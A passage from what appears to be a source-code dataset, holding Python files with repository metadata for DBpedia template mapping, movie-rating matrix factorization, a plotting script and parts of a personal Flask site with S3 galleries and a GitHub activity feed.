OUTPUT_DIR,\n\t\"it\" : \"%s/article2template/it.pkl\" % OUTPUT_DIR,\n\t\"pt\" : \"%s/article2template/pt.pkl\" % OUTPUT_DIR,\n\t\"fr\" : \"%s/article2template/fr.pkl\" % OUTPUT_DIR,\n\t\"es\" : \"%s/article2template/es.pkl\" % OUTPUT_DIR,\n\t\"zh\" : \"%s/article2template/zh.pkl\" % OUTPUT_DIR,\n\t\"bg\" : \"%s/article2template/bg.pkl\" % OUTPUT_DIR,\n}\n\nILL = {\n\t\"en\" : \"%s/link/interlanguage_links_en.ttl\" % DATA_DIR,\n\t\"de\" : \"%s/link/interlanguage_links_de.ttl\" % DATA_DIR,\n\t\"it\" : \"%s/link/interlanguage_links_it.ttl\" % DATA_DIR,\n\t\"fr\" : \"%s/link/interlanguage_links_fr.ttl\" % DATA_DIR,\n\t\"pt\" : \"%s/link/interlanguage_links_pt.ttl\" % DATA_DIR,\n\t\"es\" : \"%s/link/interlanguage_links_es.ttl\" % DATA_DIR,\n\t\"zh\" : \"%s/link/interlanguage_links_zh.ttl\" % DATA_DIR,\n\t\"bg\" : \"%s/link/interlanguage_links_bg.ttl\" % DATA_DIR,\n}\n\nILL_DICT = {\n\t\"zh2en\" : \"%s/link/dict_zh2en.pkl\" % OUTPUT_DIR,\n\t\"zh2de\" : \"%s/link/dict_zh2de.pkl\" % OUTPUT_DIR,\n\t\"zh2it\" : \"%s/link/dict_zh2it.pkl\" % OUTPUT_DIR,\n\t\"zh2fr\" : \"%s/link/dict_zh2fr.pkl\" % OUTPUT_DIR,\n\t\"zh2pt\" : \"%s/link/dict_zh2pt.pkl\" % OUTPUT_DIR,\n\t\"zh2es\" : \"%s/link/dict_zh2es.pkl\" % OUTPUT_DIR,\n\t\"zh2wikidata\" : \"%s/link/dict_zh2wikidata.pkl\" % OUTPUT_DIR,\n\t\"bg2en\" : \"%s/link/dict_bg2en.pkl\" % OUTPUT_DIR,\n\t\"bg2de\" : \"%s/link/dict_bg2de.pkl\" % OUTPUT_DIR,\n\t\"bg2it\" : \"%s/link/dict_bg2it.pkl\" % OUTPUT_DIR,\n\t\"bg2fr\" : \"%s/link/dict_bg2fr.pkl\" % OUTPUT_DIR,\n\t\"bg2pt\" : \"%s/link/dict_bg2pt.pkl\" % OUTPUT_DIR,\n\t\"bg2es\" : \"%s/link/dict_bg2es.pkl\" % OUTPUT_DIR,\n\t\"bg2wikidata\" : \"%s/link/dict_bg2wikidata.pkl\" % OUTPUT_DIR,\n}\n\nENTITY_MATRIX = {\n\t\"zh2en\" : \"%s/matrix/zh2en.csv\" % OUTPUT_DIR,\n\t\"zh2de\" : \"%s/matrix/zh2de.csv\" % OUTPUT_DIR,\n\t\"zh2fr\" : \"%s/matrix/zh2fr.csv\" % OUTPUT_DIR,\n\t\"zh2pt\" : \"%s/matrix/zh2pt.csv\" % OUTPUT_DIR,\n\t\"zh2it\" : \"%s/matrix/zh2it.csv\" % OUTPUT_DIR,\n\t\"zh2es\" : \"%s/matrix/zh2es.csv\" % OUTPUT_DIR,\n\t\"zh2wikidata\" : \"%s/matrix/zh2wikidata.csv\" % OUTPUT_DIR,\n\t\"bg2en\" : \"%s/matrix/bg2en.csv\" % OUTPUT_DIR,\n\t\"bg2de\" : \"%s/matrix/bg2de.csv\" % OUTPUT_DIR,\n\t\"bg2it\" : \"%s/matrix/bg2it.csv\" % OUTPUT_DIR,\n\t\"bg2fr\" : \"%s/matrix/bg2fr.csv\" % OUTPUT_DIR,\n\t\"bg2pt\" : \"%s/matrix/bg2pt.csv\" % OUTPUT_DIR,\n\t\"bg2es\" : \"%s/matrix/bg2es.csv\" % OUTPUT_DIR,\n\t\"bg2wikidata\" : \"%s/matrix/bg2wikidata.csv\" % OUTPUT_DIR,\n}\n\nMAPPED_INFOBOX = {\n\t\"zh\" : \"%s/predicted/zh.csv\" % OUTPUT_DIR,\n\t\"bg\" : \"%s/predicted/bg.csv\" % OUTPUT_DIR,\n}\n\nDATA_DICT = {\n\t\"bg\" : \"%s/embedding/bg.pkl\" % OUTPUT_DIR,\n\t\"en\" : \"%s/embedding/en.pkl\" % OUTPUT_DIR,\n\t\"de\" : \"%s/embedding/de.pkl\" % OUTPUT_DIR,\n}\n\nRESCAL_OUTPUT = {\n\t\"en\" : \"%s/tensor/rescal_en.pkl\" % OUTPUT_DIR,\n\t\"de\" : \"%s/tensor/rescal_de.pkl\" % OUTPUT_DIR,\n\t\"bg\" : \"%s/tensor/rescal_bg.pkl\" % OUTPUT_DIR,\n}\n\nHOLE_OUTPUT = {\n\t\"en\" : \"%s/embedding/hole_en.pkl\" % OUTPUT_DIR,\n\t\"de\" : \"%s/embedding/hole_de.pkl\" % OUTPUT_DIR,\n\t\"bg\" : \"%s/embedding/hole_bg.pkl\" % OUTPUT_DIR,\n}\n\n# --------------------- PARAM --------------------------\nLANG_PREFIX = {\n\t\"en\" : \"http://dbpedia.org/resource/\",\n\t\"de\" : \"http://de.dbpedia.org/resource/\",\n\t\"it\" : \"http://it.dbpedia.org/resource/\",\n\t\"fr\" : \"http://fr.dbpedia.org/resource/\",\n\t\"es\" : \"http://es.dbpedia.org/resource/\",\n\t\"pt\" : \"http://pt.dbpedia.org/resource/\",\n\t\"zh\" : \"http://zh.dbpedia.org/resource/\",\n\t\"bg\" : \"http://bg.dbpedia.org/resource/\",\n\t\"wikidata\" : \"http://wikidata.dbpedia.org/resource/\",\n}\n\nTEMPLATE_NAME = {\n\t\"en\" : \"Template:\",\n\t\"zh\" : \"Template:\",\n\t\"bg\" : \"Шаблон:\",\n\t\"de\" : \"Vorlage:\",\n\t\"it\" : \"Template:\",\n\t\"pt\" : \"Predefinição:\",\n\t\"fr\" : \"Modèle:\",\n\t\"es\" : \"Plantilla:\",\n}\n\nMISSING_VALUE_STRING = \"NA\"\n\n# --------------------- OTHER --------------------------\n" }, { "alpha_fraction": 0.6762682199478149, "alphanum_fraction": 0.6895503401756287, "avg_line_length": 32.96195602416992, "blob_id": "30fef1229bdddae8922b82b4910a0c15a7507027", "content_id": "b509bcc83cebe82e6ec4dc726dc6f65dbd8c02f9", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6249, "license_type": "permissive", "max_line_length": 174, "num_lines": 184, "path": "/Code/parse.py", "repo_name": "afcarl/mappings-autogeneration", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\nimport pandas as pd\nimport rdflib.graph as g\nfrom utils import time_utils, pkl_utils\nimport sys\nimport config\nfrom optparse import OptionParser\nimport os\nreload(sys)\nsys.setdefaultencoding('utf-8')\n\ndef parse_args(parser):\n\tparser.add_option(\"-l\", \"--lang\", default=\"zh\", type=\"string\", dest=\"lang\", help=\"target language\")\n\tparser.add_option(\"-p\", \"--pivot\", default=\"en\", type=\"string\", dest=\"pivot\", help=\"pivot language\")\n\t#parser.add_option(\"-m\", \"--mapping\", default=True, action=\"store_false\", dest=\"mapping\", help=\"don't get existing mapping for the pivot language\")\n\t#parser.add_option(\"-t\", \"--template\", default=True, action=\"store_false\", dest=\"template\", help=\"don't get the dict from template to article for the target language\")\n\t#parser.add_option(\"-a\", \"--article\", default=True, action=\"store_false\", dest=\"article\", help=\"don't get the dict from article to template for the pivot language\")\n\t#parser.add_option(\"-i\", \"--inter\", default=True, action=\"store_false\", dest=\"inter\", help=\"don't get the interlanguage dict from the target language to the pivot language\")\n\t(options, args) = parser.parse_args()\n\treturn options, args\n\ndef getExistingMapping(lang=\"en\"):\n\tprint \"[%s]: parse existing mapping for language %s\" % (time_utils._timestamp(), lang)\n\tG = g.Graph()\n\tG.parse(config.EXISTING_MAPPING[lang], format=\"n3\")\n\n\tq = '''\nPREFIX rr: <http://www.w3.org/ns/r2rml#>\n\nSELECT ?template ?class\nWHERE {\n\t?template rr:subjectMap ?mapping .\n\t?mapping rr:class ?class .\n}\n'''\n\tresults = G.query(q)\n\tmapping = [row[0] for row in results]\n\tontology = [row[1] for row in results]\n\tdf = pd.DataFrame({'mapping':mapping, 'ontology':ontology})\n\n\tdf[\"template\"] = df[\"mapping\"].apply(lambda x: config.TEMPLATE_NAME[lang] + x[47:])\n\tdf.to_csv(config.EXISTING_MAPPING_OUTPUT[lang], index=False)\n\tprint \"[%s]: parsing complete\" % time_utils._timestamp()\n\ndef Template2Article(lang=\"en\"):\n\tprint \"[%s]: generate template2article dict for language %s\" % (time_utils._timestamp(), lang)\n\tinfile = open(config.ARTICLE_TEMPLATES[lang])\n\tprefix = config.LANG_PREFIX[lang]\n\tlen_prefix = len(prefix)\n\ttemplateDict = {}\n\tfor line in infile.readlines():\n\t\tif line[0] != \"<\":\n\t\t\tcontinue\n\t\trow = line.split()\n\t\tarticle = row[0][1:-1]\n\t\ttemplate = row[2][1:-1]\n\t\tarticle = article[len_prefix:]\n\t\ttemplate = template[len_prefix:]\n\n\t\tif \"/\" in template:\n\t\t\tcontinue\n\n\t\tif template in templateDict:\n\t\t\ttemplateDict[template].append(article)\n\t\telse:\n\t\t\ttemplateDict[template] = [article, ]\n\tprint \"%d templates in total\" % len(templateDict)\n\tpkl_utils._save(config.TEMPLATE2ARTICLE[lang], templateDict)\n\tprint \"[%s]: generation complete\" % time_utils._timestamp()\n\ndef Article2Template(lang=\"en\"):\n\tprint \"[%s]: generate article2template dict for language %s\" % (time_utils._timestamp(), lang)\n\tinfile = open(config.ARTICLE_TEMPLATES[lang])\n\tprefix = config.LANG_PREFIX[lang]\n\tlen_prefix = len(prefix)\n\tarticleDict = {}\n\tfor line in infile.readlines():\n\t\tif line[0] != \"<\":\n\t\t\tcontinue\n\t\trow = line.split()\n\t\tarticle = row[0][1:-1]\n\t\ttemplate = row[2][1:-1]\n\t\tarticle = article[len_prefix:]\n\t\ttemplate = template[len_prefix:]\n\n\t\tif \"/\" in template:\n\t\t\tcontinue\n\n\t\tif article in articleDict:\n\t\t\tarticleDict[article].append(template)\n\t\telse:\n\t\t\tarticleDict[article] = [template, ]\n\tprint \"%d articles in total\" % len(articleDict)\n\tpkl_utils._save(config.ARTICLE2TEMPLATE[lang], articleDict)\n\tprint \"[%s]: generation complete\" % time_utils._timestamp()\n\ndef getILL(lang, target):\n\tprint \"[%s]: generate ILL dict from language %s to language %s\" % (time_utils._timestamp(), lang, target)\n\tinfile = open(config.ILL[lang])\n\tprefix1 = config.LANG_PREFIX[lang]\n\tprefix2 = config.LANG_PREFIX[target]\n\tlen1 = len(prefix1)\n\tlen2 = len(prefix2)\n\tlinkDict = {}\n\tfor line in infile.readlines():\n\t\tif line[0] != \"<\":\n\t\t\tcontinue\n\t\trow = line.split()\n\t\tlang1 = row[0][1:-1]\n\t\tlang2 = row[2][1:-1]\n\t\tif prefix1 not in lang1:\n\t\t\tcontinue\n\t\tif prefix2 not in lang2:\n\t\t\tcontinue\n\t\tlang1 = lang1[len1:]\n\t\tlang2 = lang2[len2:]\n\t\tlinkDict[lang1] = lang2\n\tprint \"%d links in total\" % len(linkDict)\n\tpkl_utils._save(config.ILL_DICT[\"%s2%s\" % (lang, target)], linkDict)\n\tprint \"[%s]: generation complete\" % time_utils._timestamp()\n\ndef process(lang, pivot):\n\tprint \"[%s]: process for language %s\" % (time_utils._timestamp(), lang)\n\tlinkDict = pkl_utils._load(config.ILL_DICT[\"%s2%s\" % (lang, pivot)])\n\ttemplateDict = pkl_utils._load(config.TEMPLATE2ARTICLE[lang])\n\tarticleDict = pkl_utils._load(config.ARTICLE2TEMPLATE[pivot])\n\tmapping = pd.read_csv(config.EXISTING_MAPPING_OUTPUT[pivot], index_col=\"template\")\n\ttemplate1 = []; template2 = []\n\tarticle1 = []; article2 = []; ontology = []\n\tfor template in templateDict:\n\t\tarticles = templateDict[template]\n\t\tfor article in articles:\n\t\t\tif article in linkDict:\n\t\t\t\ttmp = linkDict[article]\n\t\t\t\ttemplate1.append(template)\n\t\t\t\tarticle1.append(article)\n\t\t\t\tarticle2.append(tmp)\n\t\t\t\tif tmp in articleDict:\n\t\t\t\t\ttemplateList = articleDict[tmp]\n\t\t\t\telse:\n\t\t\t\t\ttemplateList = []\n\t\t\t\tc = \"\"\n\t\t\t\tt = \"\"\n\t\t\t\tfor Template in templateList:\n\t\t\t\t\tif Template in mapping.index:\n\t\t\t\t\t\tc = mapping.at[Template, \"ontology\"]\n\t\t\t\t\t\tt = Template\n\t\t\t\ttemplate2.append(t)\n\t\t\t\tontology.append(c)\n\n\tdata = {\"template1\":template1, \"article1\":article1, \"template2\":template2, \\\n\t\t\t\"article2\":article2, \"ontology\":ontology}\n\tdf = pd.DataFrame(data)\n\tdf.to_csv(config.ENTITY_MATRIX[\"%s2%s\" % (lang, pivot)], index=False)\n\tprint \"[%s]: processing complete\" % time_utils._timestamp()\n\n\ndef main(options):\n\tlang = options.lang\n\tpivot = options.pivot\n\t#mapping = options.mapping\n\t#template = options.template\n\t#article = options.article\n\t#inter = options.inter\n\t\n\tif not os.path.isfile(config.EXISTING_MAPPING_OUTPUT[pivot]):\n\t\tgetExistingMapping(lang=pivot)\n\t\n\tif not os.path.isfile(config.TEMPLATE2ARTICLE[lang]):\n\t\tTemplate2Article(lang=lang)\n\t\n\tif not os.path.isfile(config.ARTICLE2TEMPLATE[pivot]):\n\t\tArticle2Template(lang=pivot)\n\t\n\tif not os.path.isfile(config.ILL_DICT[\"%s2%s\" % (lang, pivot)]):\n\t\tgetILL(lang=lang, target=pivot)\n\n\tif not os.path.isfile(config.ENTITY_MATRIX[\"%s2%s\" % (lang, pivot)]):\n\t\tprocess(lang=lang, pivot=pivot)\n\nif __name__ == \"__main__\":\n\tparser = OptionParser()\n\toptions, args = parse_args(parser)\n\tmain(options)\n" } ]
15
wilben/Visualization-of-Latent-Factors-from-Movies
https://github.com/wilben/Visualization-of-Latent-Factors-from-Movies
5928d588fba58184d7752eb12fa406d36af2e0b5
b0bddd84e30b24afe7c932aec5e3b2b7c9083b28
16957d0791368dfcf7154e348a1efdd9fb9c5f73
refs/heads/master
2020-03-18T01:57:26.298946
2015-04-21T00:04:59
2015-04-21T00:04:59
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5377787947654724, "alphanum_fraction": 0.5464206337928772, "avg_line_length": 28.944055557250977, "blob_id": "373793423f68d7c3da9283b02a26901fd24d6988", "content_id": "eb7f6171fad1ff2e0496fc15693fe2e3729e8ac5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8563, "license_type": "no_license", "max_line_length": 79, "num_lines": 286, "path": "/main.py", "repo_name": "wilben/Visualization-of-Latent-Factors-from-Movies", "src_encoding": "UTF-8", "text": "#Visualization-of-Latent-Factors-from-Movies\nimport numpy as np\nfrom scipy.sparse import coo_matrix\nimport random\nimport copy\nfrom numpy.linalg import norm\nfrom numpy.linalg import inv\nimport pickle as pk\nfrom sklearn.decomposition import TruncatedSVD\n\ndef readMovie():\n ''' Read movie data-set from file.\n \n Returns:\n movie matrix: each column is the feature vector for a movie\n id_2_name: a dict of {movie_id: movie name}\n id_2_row: a dict of {movie_id: row number in the movie matrix}\n Note we keep this dict mostly because Python starts index\n from 0 while the data-set starts from id=0.\n '''\n\n # Initialize all dicts\n id_2_name = {}\n id_2_row = {}\n \n # {movie_id: feature vector}, to help construct movie matrix\n features = {}\n \n # Parsing from file, also construct id_2_name along the way\n with open('movies.txt', 'r') as fin:\n data = fin.readline().strip().split('\\r')\n for line in data:\n line = line.split('\\t')\n id = int(line[0])\n id_2_name[id] = line[1]\n features[id] = [float(d) for d in line[2:]]\n\n # Initialize movie matrix\n f_mat = []\n\n # Construct id_2_row and movie matrix\n for row, id in enumerate(sorted(features)):\n id_2_row[id] = row\n f_mat.append(features[id])\n\n return np.array(f_mat), id_2_name, id_2_row\n\n\ndef readUser(mid_2_col):\n ''' Read user data-set from file.\n Args:\n mid_2_col: a dict of {movie_id: column number in the rating matrix}\n Note we keep this because Python starts index from 0 wihle\n the data-set starts from 1.\n \n Returns:\n rating matrix: entry(i, j) means the rating of user i to movie j\n uid_2_row: a dict of {user_id: row number in the rating matrix}\n Note we keep this because Python starts index from 0 wihle\n the data-set starts from 1.\n obs: a list of (i, j), where entry (i, j) of the rating matrix is\n an observed rating instead of a zero entry.\n '''\n \n # Parse rating from data\n with open('data.txt', 'r') as fin:\n data = fin.readline().strip().split('\\r')\n ratings = [[int(d) for d in line.split('\\t')] for line in data]\n \n # Construct uid_2_row\n uid_2_row = {}\n for row, uid in enumerate(sorted(set([r[0] for r in ratings]))):\n uid_2_row[uid] = row\n\n # Construct rating matrix from sparse matrix\n # Also construct the list of observed entry coordinates (obs)\n obs = []\n rows = []\n cols = []\n data = []\n for r in ratings:\n uid, mid, rating = r\n rows.append(uid_2_row[uid])\n cols.append(mid_2_col[mid])\n data.append(float(rating))\n obs.append((uid_2_row[uid], mid_2_col[mid]))\n\n return coo_matrix((data, (rows, cols))).toarray(), uid_2_row, obs\n\n\ndef readUVab(fname):\n '''Reads computed U, V, a, b from file.\n \n Args:\n fname: a string, a pickle file name.\n \n Returns:\n U: latent factor matrix for users\n V: latent factor matrix for movies\n a: offset vector for users\n b: offset vector for movies\n '''\n \n with open(fname, 'r') as fin:\n data = pk.load(fin)\n return data['U'], data['V'], data['a'], data['b']\n\n\ndef saveUVab(fname, U, V, a, b):\n '''Saves computed U, V, a, b to file.\n \n Args:\n fname: a string, a file name to save to\n U: latent factor matrix for users\n V: latent factor matrix for movies\n a: offset vector for users\n b: offset vecto for movies\n '''\n\n with open(fname, 'w') as fout:\n pk.dump({'U': U, 'V': V, 'a': a, 'b': b}, fout)\n\n\ndef svd2d(V, U):\n '''Performs singular value decomposition on V, and apply 2D projection\n on V and U. We basically uses sklearn's API.\n \n Args:\n V: the latent matrix for movies\n U: the latent matrix for users\n \n Returns:\n tsvd: sklearn's svd object that has already trained on V\n V2: projected V in 2D\n U2: projected U in 2D\n '''\n tsvd = TruncatedSVD()\n tsvd.fit(V)\n return tsvd, tsvd.transform(V), tsvd.transform(U)\n\n\ndef sgd(Y, M, N, K, obs, lmb=.001, rate=.001, decay=.8):\n '''Performs stochastic gradient descent for matrix factorization.\n \n Args:\n Y: the M by N ratings matrix\n M: number of users\n N: number of movies\n K: number of latent factors\n obs: a list of observed rating coordinate, i.e. if (i, j) in obs,\n then Y[i, j] is a non-zero entry / valid rating.\n lmb: regularization coefficient\n rate: initial learning rate\n decay: the change in learning rate after each iteration\n \n Returns:\n U: latent factor matrix for users (K by N)\n V: latent factor matrix for movies (K by M)\n a: offset vector for users (dim M)\n b: offset vector for movies (dim N)\n '''\n # Threshold for convergence\n eps = .001\n # Max number of iterations\n max_iter = 1000\n # Current iteration index\n n = 0\n\n # Initilize each U, V, a, b\n new_U = np.random.rand(M, K)\n new_V = np.random.rand(N, K)\n new_a = np.random.rand(M)\n new_b = np.random.rand(N)\n \n U = np.zeros((M, K))\n V = np.zeros((N, K))\n a = np.zeros(M)\n b = np.zeros(N)\n \n while True:\n # Check whether we have converged\n if norm(U - new_U)/rate < eps and \\\n norm(V - new_V)/rate < eps and \\\n norm(a - new_a)/rate < eps and \\\n norm(b - new_b)/rate < eps:\n return U, V, a, b\n \n # Check whether we have reach max number of iterations\n n += 1\n if n > max_iter:\n return U, V, a, b\n\n # Update U, V, a, b\n U = new_U.copy()\n V = new_V.copy()\n a = new_a.copy()\n b = new_b.copy()\n \n # Shuffle the coordinates of observed ratings\n # (for stochastic gradient descent)\n list_ij = copy.deepcopy(obs)\n random.shuffle(list_ij)\n\n # For each coordinate in the shuffled list\n for i,j in list_ij:\n # Calculate the partial gradient\n du_i = lmb * new_U[i, :] - \\\n (Y[i, j] - np.dot(new_U[i, :].T, new_V[j, :]) - a[i] - b[j]) \\\n * new_V[j, :] * 2\n dv_j = lmb * new_V[j, :] - \\\n (Y[i, j] - np.dot(new_U[i, :].T, new_V[j, :]) - a[i] - b[j]) \\\n * new_U[i, :] * 2\n da_i = 2 * Y[i, j] - 2 * np.dot(U[i, :].T, new_V[j, :]) \\\n - 2 * a[i] - 2 * b[j]\n db_j = 2 * Y[i, j] - 2 * np.dot(U[i, :].T, new_V[j, :]) \\\n - 2 * a[i] - 2 * b[j]\n\n # Update new_U, new_V, new_a, new_b\n new_U[i, :] -= rate * du_i\n new_V[j, :] -= rate * dv_j\n new_a[i] -= rate * da_i\n new_b[j] -= rate * db_j\n\n # Update learning rate\n rate *= decay\n\ndef err(Y, Ypred, obs):\n '''Calculates the absolute error rate of the prediction matrix.\n \n Args:\n Y: the original rating matrix\n Ypred: the predicted rating matrix\n obs: the list of observed rating coordinates\n \n Returns:\n the average absolute error (abs(value - pred)) for each observed entry.\n '''\n \n sum = 0.0\n for i, j in obs:\n sum += np.abs(Y[i, j] - Ypred[i, j])\n return sum / len(obs)\n\ndef estimate(U, V, a, b, M, N):\n '''Calcluates the predicted ratings matrix\n \n Args:\n U: latent factor matrix for users\n V: latent factor matrix for movies\n a: offset vector for users\n b: offset vector for movies\n M: number of users\n N: number of movies\n \n Returns:\n Predicted rating matrix\n '''\n \n return np.dot(U, V.T) + np.array([a] * N).T + np.array([b] * M)\n\n\nif __name__ == '__main__':\n # First read from file\n movies, mid_2_name, mid_2_col = readMovie()\n Y, uid_2_row, obs = readUser(mid_2_col)\n \n # Number of movies\n N = len(mid_2_col)\n # Number of users\n M = len(uid_2_row)\n # Number of latent factors\n K = 20\n \n # Runs matrix factoriztion\n U, V, a, b = sgd(Y, M, N, K, obs)\n # Saves the matrices to file\n save('UV.pk', U, V, a, b)\n \n # Predicts the rating matrix, and prints out the error rate\n YY = estimate(U, V, a, b, M, N)\n print err(Y, YY, obs)\n\n # Performs SVD on V and U\n tsvd, VP, UP = svd2d(V, U)\n\n # Do some data customized data analysis and visualization" } ]
1
sujeetamberkar/Plot_graph_Using_XYValues
https://github.com/sujeetamberkar/Plot_graph_Using_XYValues
5ee075c1a03437d5a10ba1848a06ea20af5e3a97
2fba579e7762a781dd6ec3eba55feb6c8b651a6a
67fef4f91f77c02004d1db14f1d4f1638b85e813
refs/heads/main
2023-06-11T04:41:41.748646
2021-07-05T22:24:57
2021-07-05T22:24:57
383,273,282
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6132686138153076, "alphanum_fraction": 0.6294498443603516, "avg_line_length": 16.685714721679688, "blob_id": "5faf5d09ddadad58cebd864852cb4b1566516003", "content_id": "377948be8cf6fc8f8e5299dd32b5b8d135886182", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 618, "license_type": "no_license", "max_line_length": 43, "num_lines": 35, "path": "/lab01.py", "repo_name": "sujeetamberkar/Plot_graph_Using_XYValues", "src_encoding": "UTF-8", "text": "#You Need to install \n\t#pip install numpy\n\t#https://numpy.org/install/\n\n\t#pip install matplotlib\nimport numpy as np\nimport matplotlib.pyplot as plt\nw = 4\nh = 3\nd = 400\nx_List=[]\ny_List=[]\nn= int (input (\"Enter the No of data\"))\nprint(\"\\n\\n X axis Input \\n\\n\\n\")\nfor i in range (0,n):\n\tele=input()\n\tx_List.append(ele)\n\n\n\nprint(\"\\n\\n\\n Y axis input \\n\\n\")\nfor i in range (0,n):\n\tyinput=input()\n\ty_List.append(yinput)\n\n\n\nx=np.array(x_List)\ny=np.array(y_List)\nm,c=np.polyfit(x,y,1)\n#print(\"Y = \",round(m,4) ,\"X +\",round(c,4))\nprint(\"Y = \",m ,\"X +\",c)\nplt.figure(figsize=(w, h), dpi=d)\nplt.plot(x, y)\nplt.savefig(\"out.png\")" } ]
1
abalarin/PersonalSite
https://github.com/abalarin/PersonalSite
44bfc9c747fa5869f7189a5b8fd9c5aaf1a989b9
be52d07067c6e9626c9c851bc8c54945e388864c
5da0748c7c39e1f99f89bfc876c9416cd07bf551
refs/heads/master
2021-01-11T02:05:21.353301
2019-11-13T22:20:45
2019-11-13T22:20:45
70,830,357
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5895445346832275, "alphanum_fraction": 0.5916149020195007, "avg_line_length": 25.46575355529785, "blob_id": "5856a9e942a0156faa4615d3be62ed2d868fa40b", "content_id": "011264a963614a54ae223c835e28fac4a07f6092", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1932, "license_type": "no_license", "max_line_length": 108, "num_lines": 73, "path": "/austin/endpoints/gallery/utils.py", "repo_name": "abalarin/PersonalSite", "src_encoding": "UTF-8", "text": "from flask import jsonify\n\nfrom austin import client\n\n\ndef create_album(name):\n client.create_bucket(Bucket=name)\n\n\ndef list_albums():\n return client.list_buckets()['Buckets']\n\n\ndef list_images(album):\n objects = []\n for key in client.list_objects(Bucket=album)['Contents']:\n objects.append(key['Key'])\n\n return objects\n\n\ndef add_image(permisson, album, file_object, filename):\n client.put_object(ACL=permisson, Body=file_object, Bucket=album, Key=filename, ContentType='image/jpeg')\n\n\ndef get_URL(file_name):\n return client.generate_presigned_post(Bucket='austin', Key=file_name)\n\n\ndef get_albums():\n try:\n\n result = client.list_objects(Bucket='austin', Prefix='albums/', Delimiter='/')\n album_names = []\n for object in result.get('CommonPrefixes'):\n album_names.append(object['Prefix'][6:].strip('/'))\n\n albums = []\n for album_name in album_names:\n album = {\n 'Name': album_name,\n 'images': get_images(album_name)\n }\n albums.append(album)\n\n return albums\n\n except Exception as e:\n print(e)\n return jsonify({\"error\": \"There was a problem with the data you provided.\"})\n\n\ndef get_images(album):\n try:\n\n prefix = 'albums/' + str(album) + '/'\n result = client.list_objects(Bucket='austin', Prefix=prefix, Delimiter='/')\n\n image_urls = []\n skipthedir = 0 # becuase the directory itself is also retrived we want to skip it\n for object in result.get('Contents'):\n if skipthedir > 0:\n url = get_URL(object.get('Key'))\n image_urls.append(url.get('url') + '/' + url.get('fields')['key'])\n else:\n skipthedir += 1\n\n return image_urls\n\n\n except Exception as e:\n print(e)\n return jsonify({\"error\": \"There was a problem with the data you provided.\"})\n" }, { "alpha_fraction": 0.511049747467041, "alphanum_fraction": 0.5165745615959167, "avg_line_length": 18.052631378173828, "blob_id": "a3b3778bfd0a9aaed946bf683f88565cf15021c8", "content_id": "ebb94712ac4d95bd02b621b9c09fb1ee5fa6636b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 362, "license_type": "no_license", "max_line_length": 30, "num_lines": 19, "path": "/setup.py", "repo_name": "abalarin/PersonalSite", "src_encoding": "UTF-8", "text": "from setuptools import setup\n\nsetup(\n name='austin',\n packages=['austin'],\n include_package_data=True,\n install_requires=[\n 'flask',\n 'flask-sqlalchemy',\n 'flask-security',\n 'psycopg2-binary',\n 'configparser',\n 'requests',\n 'boto3',\n 'tensorflow',\n 'markdown',\n 'medium',\n ]\n)\n" }, { "alpha_fraction": 0.5627472400665283, "alphanum_fraction": 0.5800071954727173, "avg_line_length": 33.33333206176758, "blob_id": "b0d5bdaf985b61977ca28b172fcfc07a93106b4d", "content_id": "b11b4ae4c3a652932b4e4b1770bbe7ff7a7aa83b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2781, "license_type": "no_license", "max_line_length": 78, "num_lines": 81, "path": "/austin/endpoints/main/github.py", "repo_name": "abalarin/PersonalSite", "src_encoding": "UTF-8", "text": "from flask import jsonify\nfrom dateutil import parser, tz\nimport datetime\nimport requests\n\nfrom austin import Config\n\n\ndef date_convert(date_time):\n\n # This assumes datetime is coming from Zulu/UTC zone & convert to EST\n from_zone = tz.gettz('UTC')\n to_zone = tz.gettz('America/New_York')\n\n # Get Current Time\n time_now = datetime.datetime.now()\n\n # Parse given time into datetime type, convert to EST time\n old_time = parser.parse(date_time)\n old_time = old_time.replace(tzinfo=from_zone).astimezone(to_zone)\n\n # Remove the timezone awareness to calculate time difference\n old_time = old_time.replace(tzinfo=None)\n time_difference = (time_now - old_time).total_seconds()\n\n if time_difference < 60:\n return(str(int(time_difference)) + \" seconds ago\")\n\n elif time_difference < 3600:\n if time_difference < 120:\n return(str(int(time_difference / 60)) + \" minute ago\")\n else:\n return(str(int(time_difference / 60)) + \" minutes ago\")\n\n elif time_difference < 86400:\n if time_difference < 7200:\n return(str(int((time_difference / 60) / 60)) + \" hour ago\")\n else:\n return(str(int((time_difference / 60) / 60)) + \" hours ago\")\n else:\n if time_difference < 172800:\n return(str(int(((time_difference / 60) / 60) / 24)) + \" day ago\")\n else:\n return(str(int(((time_difference / 60) / 60) / 24)) + \" days ago\")\n\n return dict(date_convert)\n\n\ndef github_feed(limit):\n \"\"\" Return # of the most recent Github Actions \"\"\"\n\n url = 'https://api.github.com/users/abalarin/events/public'\n token = '?access_token=' + Config.GITHUB_TOKEN\n\n github_resp = requests.get(url + token + '&per_page=' + str(limit)).json()\n\n # print(github_resp)\n for event in github_resp:\n if event['type'] == 'WatchEvent':\n event['type'] = ' is watching'\n if event['type'] == 'ForkEvent':\n event['type'] = ' forked'\n if event['type'] == 'PushEvent':\n event['type'] = ' pushed to'\n if event['type'] == 'PullRequestEvent':\n event['type'] = ' pulled from'\n if event['type'] == 'CreateEvent':\n event['type'] = ' created repo'\n if event['type'] == 'DeleteEvent':\n event['type'] = ' deleted repo'\n if event['type'] == 'IssueCommentEvent':\n event['type'] = ' commented on'\n if event['type'] == 'IssuesEvent':\n if event['payload']['action'] == 'closed':\n event['type'] = 'closed out an issue on'\n elif event['payload']['action'] == 'opened':\n event['type'] = 'opened an issue on '\n\n event['created_at'] = date_convert(event['created_at'])\n\n return github_resp\n" }, { "alpha_fraction": 0.6150121092796326, "alphanum_fraction": 0.6513317227363586, "avg_line_length": 30.769229888916016, "blob_id": "2f687500c58bf4a5621555c0369bbf07f5a57939", "content_id": "79407b6c46403cf967d586a3b69d75ec751edafc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", 